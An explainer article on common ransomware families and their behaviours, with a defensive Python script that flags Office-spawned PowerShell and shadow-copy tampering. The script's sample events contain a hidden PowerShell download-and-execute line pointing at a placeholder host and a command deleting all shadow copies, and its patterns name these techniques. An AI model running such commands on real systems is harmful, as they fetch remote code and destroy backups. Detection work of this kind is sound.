Ransomware is computer malware that installs covertly on a victim's computer, executes a cryptovirology attack that adversely affects it, and demands a ransom payment to decrypt the data or to refrain from publishing it. Simple ransomware may lock the system in a way that is not difficult for a knowledgeable person to reverse, and display a message requesting payment to unlock it.
Ransomware is difficult to stop, even on Windows computers running antivirus, although detection is improving. The only real defence is backup, but even backups can come under attack from ransomware if they are reachable from the infected PC. Longer term, ransomware will inevitably fade, but extortion malware could move to the next tactic of threatening people with exposure for non-existent crimes such as downloading child abuse images. With more SMEs being affected than ever before, this threat has a way to run yet.
Here is a list of the top 10 different types of ransomware attack:
Along with Locky and Cerber, CryptoWall is still one of the most common ransomware threats. Produced in several versions since at least 2014, with version 4.0 distributed since late 2015 using the Angler exploit kit, CryptoWall feels like a mature piece of malware, right down to its attempts at persistence and process injection. Little things stand out, such as the way it makes every encrypted filename unique to make it more difficult to assess the damage. Recovery? No.
8. Cerber – ransomware-as-a-service
Cerber is one of a new breed of what appear to be ransomware-as-a-service applications. It encrypts files, of course, but not in Russia or the former Soviet republics, which might be a clue to its Russian origins. Once infected, the PC throws up a fake Windows system alert and forces a reboot before starting its encryption routine. Rubbing it in, Cerber even makes the PC speak its ransom demand in case the victim doesn't notice the dropped text files. Recovery? None known.
7. HydraCrypt – ransomware can be beaten
An offshoot of the CrypBoss ransomware, HydraCrypt is notable for having been pushed by the highly active Angler exploit kit, which suddenly and mysteriously disappeared in June 2016. HydraCrypt is perhaps best known for the battle between its creators and a researcher called Fabian Wosar. So far, Wosar is winning hands down, having released decryptors for successive versions of this family. Recovery? Yes.
6. Petya – attack the PC too
Ransomware usually encrypts files, but Petya's target is the system itself. Its first act is to overwrite the Master Boot Record (MBR), causing a full blue-screen-of-death crash. When the user reboots, instead of Windows they see a skull-and-crossbones splash screen with a ransom demand. Effectively, it holds hostage both the files and the entire system by encrypting the Master File Table (MFT), making the files inaccessible. Recovery? Possible.
5. PowerWare – PowerShell hijacker
Discovered by security firm Carbon Black, this one is interesting because it is aimed at businesses using Microsoft Word and the PowerShell scripting interface. The malware's innovation is that, after tempting the user to enable macros to view a booby-trapped Word attachment, it runs without writing files to disk, hooking PowerShell to download a malicious script. Writing no files makes its activity hard to detect when it encrypts files. Recovery? Possible, says Carbon Black.
4. zCrypt – ransomware that behaves like a virus
zCrypt tries the unusual technique of spreading as a virus. This means that it doesn't rely on malicious emails to find victims and can spread on USB sticks: it creates a custom autorun.inf that allows it to execute automatically when the stick is plugged into a second machine. Instead of automatically encrypting all the files it can find, it simply detects important directories and encrypts files that are changed. It scrambles files first to make recovery impossible.
3. Crysis – Locky copycat with big ambitions
First detected by ESET in early 2016, Crysis styles itself on Locky in that it encrypts shadow copies and every file it can find, including in some cases system files. This rather odd behaviour means that the infected PC can become inoperable. It attempts to elevate its privileges to admin level by stealing available logins, and even steals files, including user credentials. It also targets VMware virtual machines. Recovery? ESET has a decryptor for early versions.
2. Locky – well engineered, ruthless, clever
The work of the criminals behind the Dridex botnet, Locky is as bad as ransomware gets. Locky's creators seem to have thought of everything, not only encrypting a wide range of data files but even Bitcoin wallets and Windows Volume Snapshot Service (VSS) files, in case users try to restore files from them. It reaches out to attached shares and even to other PCs and servers. It uses strong encryption and has found several high-profile victims. Recovery? No.
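As an added example (not from the original article), the Python below shows how a defender might flag two of the behaviours described above in process-creation telemetry: the PowerWare-style chain of a Word document spawning PowerShell to download a script, and the tampering with Volume Shadow Copies that Crysis and Locky rely on to defeat restores. The sample events, the field names (loosely modelled on Sysmon Event ID 1) and the assumption that shadow copies are removed with the built-in Windows tools are all constructed for illustration.

```python
"""Flag ransomware precursors in constructed process-creation events."""
import re

# Office applications whose macros should never need a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Built-in tools commonly used to remove restore points (assumption, not from the article).
SHADOW_TAMPER = [
    re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"wmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"Win32_ShadowCopy", re.I),
]
# Hints that PowerShell is fetching and running a remote script (PowerWare-style staging).
DOWNLOAD_HINTS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|-enc(odedcommand)?\b|\bIEX\b|Invoke-Expression)", re.I)

def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return a list of 'finding:severity' strings for one process-creation event."""
    findings = []
    parent, image = basename(event.get("ParentImage", "")), basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        # Office spawning a script host is suspicious; a download primitive makes it worse.
        severity = "high" if DOWNLOAD_HINTS.search(cmd) else "medium"
        findings.append(f"office-spawns-script-host:{severity}")
    if any(p.search(cmd) for p in SHADOW_TAMPER):
        findings.append("shadow-copy-tampering:high")
    return findings

def scan(events):
    """Return (ProcessId, finding) pairs for every finding across the events."""
    return [(e["ProcessId"], f) for e in events for f in classify(e)]

# Constructed sample telemetry; the URL is a placeholder, not a real indicator.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')\""},
    {"ProcessId": 4188, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\vssadmin.exe", "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"ProcessId": 5200, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "CommandLine": "powershell.exe Get-ChildItem C:\\Logs"},
]

if __name__ == "__main__":
    for pid, finding in scan(SAMPLE_EVENTS):
        print(pid, finding)
```

The benign third event (Explorer launching PowerShell for a directory listing) produces no finding, which is the point: the parent-child pair, not PowerShell itself, is the signal.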
CryptoLocker is long gone (downed by Operation Tovar in 2014), but it deserves infamy because its 2013 heyday proved to cybercriminals how successful ransomware could be. It was supplanted by the equally vicious CryptoWall, which remains a headache to this day on systems not running updated AV or endpoint security. A long way behind the state of the art, but it doesn't need to be. Recovery? No.